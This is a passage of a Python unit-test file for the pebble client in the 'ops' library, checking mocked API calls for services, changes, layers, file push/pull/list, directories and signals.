self.requests.append((method, path, query, headers, data))
headers, body = self.responses.pop(0)
return MockHTTPResponse(headers, body)
def _connect_websocket(self, task_id, websocket_id):
return self.websockets[task_id, websocket_id]
class MockHTTPResponse:
def __init__(self, headers, body):
self.headers = headers
reader = io.BytesIO(body)
self.read = reader.read
class MockTime:
"""Mocked versions of time.time() and time.sleep().
MockTime.sleep() advances the clock and MockTime.time() returns the current time.
"""
def __init__(self):
self._time = 0
def time(self):
return self._time
def sleep(self, delay):
self._time += delay
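# Sketch of MockTime in isolation: sleep() advances the fake clock instead of
# blocking, which is what makes the timeout tests below deterministic.
def _mock_time_sketch():
    clock = MockTime()
    assert clock.time() == 0
    clock.sleep(4)
    assert clock.time() == 4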
def build_mock_change_dict(change_id='70'):
return {
"id": change_id,
"kind": "autostart",
"ready": True,
"ready-time": "2021-01-28T14:37:04.291517768+13:00",
"spawn-time": "2021-01-28T14:37:02.247202105+13:00",
"status": "Done",
"summary": 'Autostart service "svc"',
"tasks": [
{
"id": "78",
"kind": "start",
"progress": {
"done": 1,
"label": "",
"total": 1,
"extra-field": "foo",
},
"ready-time": "2021-01-28T14:37:03.270218778+13:00",
"spawn-time": "2021-01-28T14:37:02.247158162+13:00",
"status": "Done",
"summary": 'Start service "svc"',
"extra-field": "foo",
},
],
"extra-field": "foo",
}
class TestClient(unittest.TestCase):
maxDiff = None
def setUp(self):
self.client = MockClient()
self.time = MockTime()
time_patcher = unittest.mock.patch('ops.pebble.time', self.time)
time_patcher.start()
self.addCleanup(time_patcher.stop)
def test_client_init(self):
pebble.Client(socket_path='foo') # test that constructor runs
with self.assertRaises(ValueError):
pebble.Client() # socket_path arg required
def test_get_system_info(self):
self.client.responses.append({
"result": {
"version": "1.2.3",
"extra-field": "foo",
},
"status": "OK",
"status-code": 200,
"type": "sync"
})
info = self.client.get_system_info()
self.assertEqual(info.version, '1.2.3')
self.assertEqual(self.client.requests, [
('GET', '/v1/system-info', None, None),
])
def test_get_warnings(self):
empty = {
"result": [],
"status": "OK",
"status-code": 200,
"type": "sync"
}
self.client.responses.append(empty)
warnings = self.client.get_warnings()
self.assertEqual(warnings, [])
self.client.responses.append(empty)
warnings = self.client.get_warnings(select=pebble.WarningState.ALL)
self.assertEqual(warnings, [])
self.assertEqual(self.client.requests, [
('GET', '/v1/warnings', {'select': 'pending'}, None),
('GET', '/v1/warnings', {'select': 'all'}, None),
])
def test_ack_warnings(self):
self.client.responses.append({
"result": 0,
"status": "OK",
"status-code": 200,
"type": "sync"
})
num = self.client.ack_warnings(datetime_nzdt(2021, 1, 28, 15, 11, 0))
self.assertEqual(num, 0)
self.assertEqual(self.client.requests, [
('POST', '/v1/warnings', None, {
'action': 'okay',
'timestamp': '2021-01-28T15:11:00+13:00',
}),
])
def assert_mock_change(self, change):
self.assertEqual(change.id, '70')
self.assertEqual(change.kind, 'autostart')
self.assertEqual(change.summary, 'Autostart service "svc"')
self.assertEqual(change.status, 'Done')
self.assertEqual(len(change.tasks), 1)
self.assertEqual(change.tasks[0].id, '78')
self.assertEqual(change.tasks[0].kind, 'start')
self.assertEqual(change.tasks[0].summary, 'Start service "svc"')
self.assertEqual(change.tasks[0].status, 'Done')
self.assertEqual(change.tasks[0].log, [])
self.assertEqual(change.tasks[0].progress.done, 1)
self.assertEqual(change.tasks[0].progress.label, '')
self.assertEqual(change.tasks[0].progress.total, 1)
self.assertEqual(change.tasks[0].ready_time,
datetime_nzdt(2021, 1, 28, 14, 37, 3, 270219))
self.assertEqual(change.tasks[0].spawn_time,
datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158))
self.assertEqual(change.ready, True)
self.assertEqual(change.err, None)
self.assertEqual(change.ready_time, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518))
self.assertEqual(change.spawn_time, datetime_nzdt(2021, 1, 28, 14, 37, 2, 247202))
def test_get_changes(self):
empty = {
"result": [],
"status": "OK",
"status-code": 200,
"type": "sync"
}
self.client.responses.append(empty)
changes = self.client.get_changes()
self.assertEqual(changes, [])
self.client.responses.append(empty)
changes = self.client.get_changes(select=pebble.ChangeState.ALL)
self.assertEqual(changes, [])
self.client.responses.append(empty)
changes = self.client.get_changes(select=pebble.ChangeState.ALL, service='foo')
self.assertEqual(changes, [])
self.client.responses.append({
"result": [
build_mock_change_dict(),
],
"status": "OK",
"status-code": 200,
"type": "sync"
})
changes = self.client.get_changes()
self.assertEqual(len(changes), 1)
self.assert_mock_change(changes[0])
self.assertEqual(self.client.requests, [
('GET', '/v1/changes', {'select': 'in-progress'}, None),
('GET', '/v1/changes', {'select': 'all'}, None),
('GET', '/v1/changes', {'select': 'all', 'for': 'foo'}, None),
('GET', '/v1/changes', {'select': 'in-progress'}, None),
])
def test_get_change(self):
self.client.responses.append({
"result": build_mock_change_dict(),
"status": "OK",
"status-code": 200,
"type": "sync"
})
change = self.client.get_change('70')
self.assert_mock_change(change)
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70', None, None),
])
def test_abort_change(self):
self.client.responses.append({
"result": build_mock_change_dict(),
"status": "OK",
"status-code": 200,
"type": "sync"
})
change = self.client.abort_change('70')
self.assert_mock_change(change)
self.assertEqual(self.client.requests, [
('POST', '/v1/changes/70', None, {'action': 'abort'}),
])
def _services_action_helper(self, action, api_func, services):
self.client.responses.append({
"change": "70",
"result": None,
"status": "Accepted",
"status-code": 202,
"type": "async"
})
change = build_mock_change_dict()
change['ready'] = True
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
change_id = api_func()
self.assertEqual(change_id, '70')
self.assertEqual(self.client.requests, [
('POST', '/v1/services', None, {'action': action, 'services': services}),
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
])
def _services_action_async_helper(self, action, api_func, services):
self.client.responses.append({
"change": "70",
"result": None,
"status": "Accepted",
"status-code": 202,
"type": "async"
})
change_id = api_func(timeout=0)
self.assertEqual(change_id, '70')
self.assertEqual(self.client.requests, [
('POST', '/v1/services', None, {'action': action, 'services': services}),
])
def test_autostart_services(self):
self._services_action_helper('autostart', self.client.autostart_services, [])
def test_autostart_services_async(self):
self._services_action_async_helper('autostart', self.client.autostart_services, [])
def test_replan_services(self):
self._services_action_helper('replan', self.client.replan_services, [])
def test_replan_services_async(self):
self._services_action_async_helper('replan', self.client.replan_services, [])
def test_start_services(self):
def api_func():
return self.client.start_services(['svc'])
self._services_action_helper('start', api_func, ['svc'])
with self.assertRaises(TypeError):
self.client.start_services(1)
with self.assertRaises(TypeError):
self.client.start_services([1])
with self.assertRaises(TypeError):
self.client.start_services([['foo']])
def test_start_services_async(self):
def api_func(timeout=30):
return self.client.start_services(['svc'], timeout=timeout)
self._services_action_async_helper('start', api_func, ['svc'])
def test_stop_services(self):
def api_func():
return self.client.stop_services(['svc'])
self._services_action_helper('stop', api_func, ['svc'])
with self.assertRaises(TypeError):
self.client.stop_services(1)
with self.assertRaises(TypeError):
self.client.stop_services([1])
with self.assertRaises(TypeError):
self.client.stop_services([['foo']])
def test_stop_services_async(self):
def api_func(timeout=30):
return self.client.stop_services(['svc'], timeout=timeout)
self._services_action_async_helper('stop', api_func, ['svc'])
def test_restart_services(self):
def api_func():
return self.client.restart_services(['svc'])
self._services_action_helper('restart', api_func, ['svc'])
with self.assertRaises(TypeError):
self.client.restart_services(1)
with self.assertRaises(TypeError):
self.client.restart_services([1])
with self.assertRaises(TypeError):
self.client.restart_services([['foo']])
def test_restart_services_async(self):
def api_func(timeout=30):
return self.client.restart_services(['svc'], timeout=timeout)
self._services_action_async_helper('restart', api_func, ['svc'])
def test_change_error(self):
self.client.responses.append({
"change": "70",
"result": None,
"status": "Accepted",
"status-code": 202,
"type": "async"
})
change = build_mock_change_dict()
change['err'] = 'Some kind of service error'
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
with self.assertRaises(pebble.ChangeError) as cm:
self.client.autostart_services()
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(cm.exception.err, 'Some kind of service error')
self.assertIsInstance(cm.exception.change, pebble.Change)
self.assertEqual(cm.exception.change.id, '70')
self.assertEqual(self.client.requests, [
('POST', '/v1/services', None, {'action': 'autostart', 'services': []}),
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
])
def test_wait_change_success(self, timeout=30.0):
change = build_mock_change_dict()
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
response = self.client.wait_change('70', timeout=timeout)
self.assertEqual(response.id, '70')
self.assertTrue(response.ready)
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
])
def test_wait_change_success_timeout_none(self):
self.test_wait_change_success(timeout=None)
def test_wait_change_success_multiple_calls(self):
def timeout_response(n):
self.time.sleep(n) # simulate passing of time due to wait_change call
raise pebble.APIError({}, 504, "Gateway Timeout", "timed out")
self.client.responses.append(lambda: timeout_response(4))
change = build_mock_change_dict()
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
response = self.client.wait_change('70')
self.assertEqual(response.id, '70')
self.assertTrue(response.ready)
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(self.time.time(), 4)
def test_wait_change_success_polled(self, timeout=30.0):
# Trigger polled mode
self.client.responses.append(pebble.APIError({}, 404, "Not Found", "not found"))
for i in range(3):
change = build_mock_change_dict()
change['ready'] = i == 2
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
response = self.client.wait_change('70', timeout=timeout, delay=1)
self.assertEqual(response.id, '70')
self.assertTrue(response.ready)
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
('GET', '/v1/changes/70', None, None),
('GET', '/v1/changes/70', None, None),
('GET', '/v1/changes/70', None, None),
])
self.assertEqual(self.time.time(), 2)
def test_wait_change_success_polled_timeout_none(self):
self.test_wait_change_success_polled(timeout=None)
def test_wait_change_timeout(self):
def timeout_response(n):
self.time.sleep(n) # simulate passing of time due to wait_change call
raise pebble.APIError({}, 504, "Gateway Timeout", "timed out")
self.client.responses.append(lambda: timeout_response(4))
self.client.responses.append(lambda: timeout_response(2))
with self.assertRaises(pebble.TimeoutError) as cm:
self.client.wait_change('70', timeout=6)
self.assertIsInstance(cm.exception, pebble.Error)
self.assertIsInstance(cm.exception, TimeoutError)
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
('GET', '/v1/changes/70/wait', {'timeout': '2.000s'}, None),
])
self.assertEqual(self.time.time(), 6)
def test_wait_change_timeout_polled(self):
# Trigger polled mode
self.client.responses.append(pebble.APIError({}, 404, "Not Found", "not found"))
change = build_mock_change_dict()
change['ready'] = False
for _ in range(3):
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
with self.assertRaises(pebble.TimeoutError) as cm:
self.client.wait_change('70', timeout=3, delay=1)
self.assertIsInstance(cm.exception, pebble.Error)
self.assertIsInstance(cm.exception, TimeoutError)
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '3.000s'}, None),
('GET', '/v1/changes/70', None, None),
('GET', '/v1/changes/70', None, None),
('GET', '/v1/changes/70', None, None),
])
self.assertEqual(self.time.time(), 3)
def test_wait_change_error(self):
change = build_mock_change_dict()
change['err'] = 'Some kind of service error'
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
# wait_change() itself shouldn't raise an error
response = self.client.wait_change('70')
self.assertEqual(response.id, '70')
self.assertEqual(response.err, 'Some kind of service error')
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
])
def test_add_layer(self):
okay_response = {
"result": True,
"status": "OK",
"status-code": 200,
"type": "sync"
}
self.client.responses.append(okay_response)
self.client.responses.append(okay_response)
self.client.responses.append(okay_response)
self.client.responses.append(okay_response)
layer_yaml = """
services:
foo:
command: echo bar
override: replace
"""[1:]
layer = pebble.Layer(layer_yaml)
self.client.add_layer('a', layer)
self.client.add_layer('b', layer.to_yaml())
self.client.add_layer('c', layer.to_dict())
self.client.add_layer('d', layer, combine=True)
def build_expected(label, combine):
return {
'action': 'add',
'combine': combine,
'label': label,
'format': 'yaml',
'layer': layer_yaml,
}
self.assertEqual(self.client.requests, [
('POST', '/v1/layers', None, build_expected('a', False)),
('POST', '/v1/layers', None, build_expected('b', False)),
('POST', '/v1/layers', None, build_expected('c', False)),
('POST', '/v1/layers', None, build_expected('d', True)),
])
def test_add_layer_invalid_type(self):
with self.assertRaises(TypeError):
self.client.add_layer('foo', 42)
with self.assertRaises(TypeError):
self.client.add_layer(42, 'foo')
# combine is a keyword-only arg (should be combine=True)
with self.assertRaises(TypeError):
self.client.add_layer('foo', {}, True)
def test_get_plan(self):
plan_yaml = """
services:
foo:
command: echo bar
override: replace
"""[1:]
self.client.responses.append({
"result": plan_yaml,
"status": "OK",
"status-code": 200,
"type": "sync"
})
plan = self.client.get_plan()
self.assertEqual(plan.to_yaml(), plan_yaml)
self.assertEqual(len(plan.services), 1)
self.assertEqual(plan.services['foo'].command, 'echo bar')
self.assertEqual(plan.services['foo'].override, 'replace')
self.assertEqual(self.client.requests, [
('GET', '/v1/plan', {'format': 'yaml'}, None),
])
def test_get_services_all(self):
self.client.responses.append({
"result": [
{
"current": "inactive",
"name": "svc1",
"startup": "disabled"
},
{
"current": "active",
"name": "svc2",
"startup": "enabled"
}
],
"status": "OK",
"status-code": 200,
"type": "sync"
})
services = self.client.get_services()
self.assertEqual(len(services), 2)
self.assertEqual(services[0].name, 'svc1')
self.assertEqual(services[0].startup, pebble.ServiceStartup.DISABLED)
self.assertEqual(services[0].current, pebble.ServiceStatus.INACTIVE)
self.assertEqual(services[1].name, 'svc2')
self.assertEqual(services[1].startup, pebble.ServiceStartup.ENABLED)
self.assertEqual(services[1].current, pebble.ServiceStatus.ACTIVE)
self.assertEqual(self.client.requests, [
('GET', '/v1/services', None, None),
])
def test_get_services_names(self):
self.client.responses.append({
"result": [
{
"current": "inactive",
"name": "svc1",
"startup": "disabled"
},
{
"current": "active",
"name": "svc2",
"startup": "enabled"
}
],
"status": "OK",
"status-code": 200,
"type": "sync"
})
services = self.client.get_services(['svc1', 'svc2'])
self.assertEqual(len(services), 2)
self.assertEqual(services[0].name, 'svc1')
self.assertEqual(services[0].startup, pebble.ServiceStartup.DISABLED)
self.assertEqual(services[0].current, pebble.ServiceStatus.INACTIVE)
self.assertEqual(services[1].name, 'svc2')
self.assertEqual(services[1].startup, pebble.ServiceStartup.ENABLED)
self.assertEqual(services[1].current, pebble.ServiceStatus.ACTIVE)
self.client.responses.append({
"result": [
{
"current": "active",
"name": "svc2",
"startup": "enabled"
}
],
"status": "OK",
"status-code": 200,
"type": "sync"
})
services = self.client.get_services(['svc2'])
self.assertEqual(len(services), 1)
self.assertEqual(services[0].name, 'svc2')
self.assertEqual(services[0].startup, pebble.ServiceStartup.ENABLED)
self.assertEqual(services[0].current, pebble.ServiceStatus.ACTIVE)
self.assertEqual(self.client.requests, [
('GET', '/v1/services', {'names': 'svc1,svc2'}, None),
('GET', '/v1/services', {'names': 'svc2'}, None),
])
def test_pull_text(self):
self.client.responses.append((
{'Content-Type': 'multipart/form-data; boundary=01234567890123456789012345678901'},
b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="files"; filename="/etc/hosts"
127.0.0.1 localhost # """ + b'\xf0\x9f\x98\x80\nfoo\r\nbar' + b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="response"
{
"result": [{"path": "/etc/hosts"}],
"status": "OK",
"status-code": 200,
"type": "sync"
}
--01234567890123456789012345678901--
""",
))
content = self.client.pull('/etc/hosts').read()
self.assertEqual(content, '127.0.0.1 localhost # 😀\nfoo\r\nbar')
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'read', 'path': '/etc/hosts'},
{'Accept': 'multipart/form-data'}, None),
])
def test_pull_binary(self):
self.client.responses.append((
{'Content-Type': 'multipart/form-data; boundary=01234567890123456789012345678901'},
b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="files"; filename="/etc/hosts"
127.0.0.1 localhost # """ + b'\xf0\x9f\x98\x80\nfoo\r\nbar' + b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="response"
{
"result": [{"path": "/etc/hosts"}],
"status": "OK",
"status-code": 200,
"type": "sync"
}
--01234567890123456789012345678901--
""",
))
content = self.client.pull('/etc/hosts', encoding=None).read()
self.assertEqual(content, b'127.0.0.1 localhost # \xf0\x9f\x98\x80\nfoo\r\nbar')
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'read', 'path': '/etc/hosts'},
{'Accept': 'multipart/form-data'}, None),
])
def test_pull_path_error(self):
self.client.responses.append((
{'Content-Type': 'multipart/form-data; boundary=01234567890123456789012345678901'},
b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="response"
{
"result": [
{"path": "/etc/hosts", "error": {"kind": "not-found", "message": "not found"}}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
--01234567890123456789012345678901--
""",
))
with self.assertRaises(pebble.PathError) as cm:
self.client.pull('/etc/hosts')
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(cm.exception.kind, 'not-found')
self.assertEqual(cm.exception.message, 'not found')
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'read', 'path': '/etc/hosts'},
{'Accept': 'multipart/form-data'}, None),
])
def test_pull_protocol_errors(self):
self.client.responses.append(({'Content-Type': 'ct'}, b''))
with self.assertRaises(pebble.ProtocolError) as cm:
self.client.pull('/etc/hosts')
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(str(cm.exception),
"expected Content-Type 'multipart/form-data', got 'ct'")
self.client.responses.append(({'Content-Type': 'multipart/form-data'}, b''))
with self.assertRaises(pebble.ProtocolError) as cm:
self.client.pull('/etc/hosts')
self.assertEqual(str(cm.exception), "invalid boundary ''")
self.client.responses.append((
{'Content-Type': 'multipart/form-data; boundary=01234567890123456789012345678901'},
b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="files"; filename="/bad"
bad path
--01234567890123456789012345678901--
""",
))
with self.assertRaises(pebble.ProtocolError) as cm:
self.client.pull('/etc/hosts')
self.assertEqual(str(cm.exception), "path not expected: /bad")
self.client.responses.append((
{'Content-Type': 'multipart/form-data; boundary=01234567890123456789012345678901'},
b"""
--01234567890123456789012345678901
Content-Disposition: form-data; name="files"; filename="/etc/hosts"
bad path
--01234567890123456789012345678901--
""",
))
with self.assertRaises(pebble.ProtocolError) as cm:
self.client.pull('/etc/hosts')
self.assertEqual(str(cm.exception), 'no "response" field in multipart body')
def test_push_str(self):
self._test_push_str('content 😀\nfoo\r\nbar')
def test_push_text(self):
self._test_push_str(io.StringIO('content 😀\nfoo\r\nbar'))
def _test_push_str(self, source):
self.client.responses.append((
{'Content-Type': 'application/json'},
b"""
{
"result": [
{"path": "/foo/bar"}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
""",
))
self.client.push('/foo/bar', source)
self.assertEqual(len(self.client.requests), 1)
request = self.client.requests[0]
self.assertEqual(request[:3], ('POST', '/v1/files', None))
headers, body = request[3:]
content_type = headers['Content-Type']
req, filename, content = self._parse_write_multipart(content_type, body)
self.assertEqual(filename, '/foo/bar')
self.assertEqual(content, b'content \xf0\x9f\x98\x80\nfoo\r\nbar')
self.assertEqual(req, {
'action': 'write',
'files': [{'path': '/foo/bar'}],
})
def test_push_bytes(self):
self._test_push_bytes(b'content \xf0\x9f\x98\x80\nfoo\r\nbar')
def test_push_binary(self):
self._test_push_bytes(io.BytesIO(b'content \xf0\x9f\x98\x80\nfoo\r\nbar'))
def _test_push_bytes(self, source):
self.client.responses.append((
{'Content-Type': 'application/json'},
b"""
{
"result": [
{"path": "/foo/bar"}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
""",
))
self.client.push('/foo/bar', source)
self.assertEqual(len(self.client.requests), 1)
request = self.client.requests[0]
self.assertEqual(request[:3], ('POST', '/v1/files', None))
headers, body = request[3:]
content_type = headers['Content-Type']
req, filename, content = self._parse_write_multipart(content_type, body)
self.assertEqual(filename, '/foo/bar')
self.assertEqual(content, b'content \xf0\x9f\x98\x80\nfoo\r\nbar')
self.assertEqual(req, {
'action': 'write',
'files': [{'path': '/foo/bar'}],
})
def test_push_all_options(self):
self.client.responses.append((
{'Content-Type': 'application/json'},
b"""
{
"result": [
{"path": "/foo/bar"}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
""",
))
self.client.push('/foo/bar', 'content', make_dirs=True, permissions=0o600,
user_id=12, user='bob', group_id=34, group='staff')
self.assertEqual(len(self.client.requests), 1)
request = self.client.requests[0]
self.assertEqual(request[:3], ('POST', '/v1/files', None))
headers, body = request[3:]
content_type = headers['Content-Type']
req, filename, content = self._parse_write_multipart(content_type, body)
self.assertEqual(filename, '/foo/bar')
self.assertEqual(content, b'content')
self.assertEqual(req, {
'action': 'write',
'files': [{
'path': '/foo/bar',
'make-dirs': True,
'permissions': '600',
'user-id': 12,
'user': 'bob',
'group-id': 34,
'group': 'staff',
}],
})
def test_push_uid_gid(self):
self.client.responses.append((
{'Content-Type': 'application/json'},
b"""
{
"result": [
{"path": "/foo/bar"}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
""",
))
self.client.push('/foo/bar', 'content', user_id=12, group_id=34)
self.assertEqual(len(self.client.requests), 1)
request = self.client.requests[0]
self.assertEqual(request[:3], ('POST', '/v1/files', None))
headers, body = request[3:]
content_type = headers['Content-Type']
req, filename, content = self._parse_write_multipart(content_type, body)
self.assertEqual(filename, '/foo/bar')
self.assertEqual(content, b'content')
self.assertEqual(req, {
'action': 'write',
'files': [{
'path': '/foo/bar',
'user-id': 12,
'group-id': 34,
}],
})
def test_push_path_error(self):
self.client.responses.append((
{'Content-Type': 'application/json'},
b"""
{
"result": [
{"path": "/foo/bar", "error": {"kind": "not-found", "message": "not found"}}
],
"status": "OK",
"status-code": 200,
"type": "sync"
}
""",
))
with self.assertRaises(pebble.PathError) as cm:
self.client.push('/foo/bar', 'content')
self.assertEqual(cm.exception.kind, 'not-found')
self.assertEqual(cm.exception.message, 'not found')
self.assertEqual(len(self.client.requests), 1)
request = self.client.requests[0]
self.assertEqual(request[:3], ('POST', '/v1/files', None))
headers, body = request[3:]
content_type = headers['Content-Type']
req, filename, content = self._parse_write_multipart(content_type, body)
self.assertEqual(filename, '/foo/bar')
self.assertEqual(content, b'content')
self.assertEqual(req, {
'action': 'write',
'files': [{'path': '/foo/bar'}],
})
def _parse_write_multipart(self, content_type, body):
ctype, options = cgi.parse_header(content_type)
self.assertEqual(ctype, 'multipart/form-data')
boundary = options['boundary']
# We have to manually write the Content-Type with boundary, because
# email.parser expects the entire multipart message with headers.
parser = email.parser.BytesFeedParser()
parser.feed(b'Content-Type: multipart/form-data; boundary='
+ boundary.encode('utf-8') + b'\r\n\r\n')
for b in body:
# With the "memory efficient push" changes, body is an iterable.
parser.feed(b)
message = parser.close()
req = None
filename = None
content = None
for part in message.walk():
name = part.get_param('name', header='Content-Disposition')
if name == 'request':
req = json.loads(part.get_payload())
elif name == 'files':
# decode=True, ironically, avoids decoding bytes to str
content = part.get_payload(decode=True)
filename = part.get_filename()
return (req, filename, content)
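    # For reference, the push body assembled by the client is multipart/form-data
    # shaped roughly like this (a sketch inferred from the parser above; the
    # boundary value is illustrative):
    #
    #   --BOUNDARY
    #   Content-Disposition: form-data; name="request"
    #
    #   {"action": "write", "files": [{"path": "/foo/bar"}]}
    #   --BOUNDARY
    #   Content-Disposition: form-data; name="files"; filename="/foo/bar"
    #
    #   <file content>
    #   --BOUNDARY--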
def test_list_files_path(self):
self.client.responses.append({
"result": [
{
'path': '/etc/hosts',
'name': 'hosts',
'type': 'file',
'size': 123,
'permissions': '644',
'last-modified': '2021-01-28T14:37:04.291517768+13:00',
'user-id': 12,
'user': 'bob',
'group-id': 34,
'group': 'staff',
},
{
'path': '/etc/nginx',
'name': 'nginx',
'type': 'directory',
'permissions': '755',
'last-modified': '2020-01-01T01:01:01.000000+13:00',
},
],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
infos = self.client.list_files('/etc')
self.assertEqual(len(infos), 2)
self.assertEqual(infos[0].path, '/etc/hosts')
self.assertEqual(infos[0].name, 'hosts')
self.assertEqual(infos[0].type, pebble.FileType.FILE)
self.assertEqual(infos[0].size, 123)
self.assertEqual(infos[0].permissions, 0o644)
self.assertEqual(infos[0].last_modified, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518))
self.assertEqual(infos[0].user_id, 12)
self.assertEqual(infos[0].user, 'bob')
self.assertEqual(infos[0].group_id, 34)
self.assertEqual(infos[0].group, 'staff')
self.assertEqual(infos[1].path, '/etc/nginx')
self.assertEqual(infos[1].name, 'nginx')
self.assertEqual(infos[1].type, pebble.FileType.DIRECTORY)
self.assertEqual(infos[1].size, None)
self.assertEqual(infos[1].permissions, 0o755)
self.assertEqual(infos[1].last_modified, datetime_nzdt(2020, 1, 1, 1, 1, 1, 0))
self.assertIs(infos[1].user_id, None)
self.assertIs(infos[1].user, None)
self.assertIs(infos[1].group_id, None)
self.assertIs(infos[1].group, None)
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'list', 'path': '/etc'}, None),
])
def test_list_files_pattern(self):
self.client.responses.append({
"result": [],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
infos = self.client.list_files('/etc', pattern='*.conf')
self.assertEqual(len(infos), 0)
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'list', 'path': '/etc', 'pattern': '*.conf'}, None),
])
def test_list_files_itself(self):
self.client.responses.append({
"result": [],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
infos = self.client.list_files('/etc', itself=True)
self.assertEqual(len(infos), 0)
self.assertEqual(self.client.requests, [
('GET', '/v1/files', {'action': 'list', 'path': '/etc', 'itself': 'true'}, None),
])
def test_make_dir_basic(self):
self.client.responses.append({
"result": [{'path': '/foo/bar'}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.make_dir('/foo/bar')
req = {'action': 'make-dirs', 'dirs': [{
'path': '/foo/bar',
}]}
self.assertEqual(self.client.requests, [
('POST', '/v1/files', None, req),
])
def test_make_dir_all_options(self):
self.client.responses.append({
"result": [{'path': '/foo/bar'}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.make_dir('/foo/bar', make_parents=True, permissions=0o600,
user_id=12, user='bob', group_id=34, group='staff')
req = {'action': 'make-dirs', 'dirs': [{
'path': '/foo/bar',
'make-parents': True,
'permissions': '600',
'user-id': 12,
'user': 'bob',
'group-id': 34,
'group': 'staff',
}]}
self.assertEqual(self.client.requests, [
('POST', '/v1/files', None, req),
])
def test_make_dir_error(self):
self.client.responses.append({
"result": [{
'path': '/foo/bar',
'error': {
'kind': 'permission-denied',
'message': 'permission denied',
},
}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
with self.assertRaises(pebble.PathError) as cm:
self.client.make_dir('/foo/bar')
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(cm.exception.kind, 'permission-denied')
self.assertEqual(cm.exception.message, 'permission denied')
def test_remove_path_basic(self):
self.client.responses.append({
"result": [{'path': '/boo/far'}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.remove_path('/boo/far')
req = {'action': 'remove', 'paths': [{
'path': '/boo/far',
}]}
self.assertEqual(self.client.requests, [
('POST', '/v1/files', None, req),
])
def test_remove_path_recursive(self):
self.client.responses.append({
"result": [{'path': '/boo/far'}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.remove_path('/boo/far', recursive=True)
req = {'action': 'remove', 'paths': [{
'path': '/boo/far',
'recursive': True,
}]}
self.assertEqual(self.client.requests, [
('POST', '/v1/files', None, req),
])
def test_remove_path_error(self):
self.client.responses.append({
"result": [{
'path': '/boo/far',
'error': {
'kind': 'generic-file-error',
'message': 'some other error',
},
}],
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
with self.assertRaises(pebble.PathError) as cm:
self.client.remove_path('/boo/far')
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(cm.exception.kind, 'generic-file-error')
self.assertEqual(cm.exception.message, 'some other error')
def test_send_signal_name(self):
self.client.responses.append({
'result': True,
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.send_signal('SIGHUP', ['s1', 's2'])
self.assertEqual(self.client.requests, [
('POST', '/v1/signals', None, {'signal': 'SIGHUP', 'services': ['s1', 's2']}),
])
@unittest.skipUnless(hasattr(signal, 'SIGHUP'), 'signal constants not present on Windows')
def test_send_signal_number(self):
self.client.responses.append({
'result': True,
'status': 'OK',
'status-code': 200,
'type': 'sync',
})
self.client.send_signal(signal.SIGHUP, ['s1', 's2'])
self.assertEqual(self.client.requests, [
('POST', '/v1/signals', None, {'signal': 'SIGHUP', 'services': ['s1', 's2']}),
])
def test_send_signal_type_error(self):
with self.assertRaises(TypeError):
self.client.send_signal('SIGHUP', 'should-be-a-list')
with self.assertRaises(TypeError):
self.client.send_signal('SIGHUP', [1, 2])
@unittest.skipIf(sys.platform == 'win32', "Unix sockets don't work on Windows")
class TestSocketClient(unittest.TestCase):
def test_socket_not_found(self):
client = pebble.Client(socket_path='does_not_exist')
with self.assertRaises(pebble.ConnectionError) as cm:
client.get_system_info()
self.assertIsInstance(cm.exception, pebble.Error)
def test_real_client(self):
shutdown, socket_path = fake_pebble.start_server()
try:
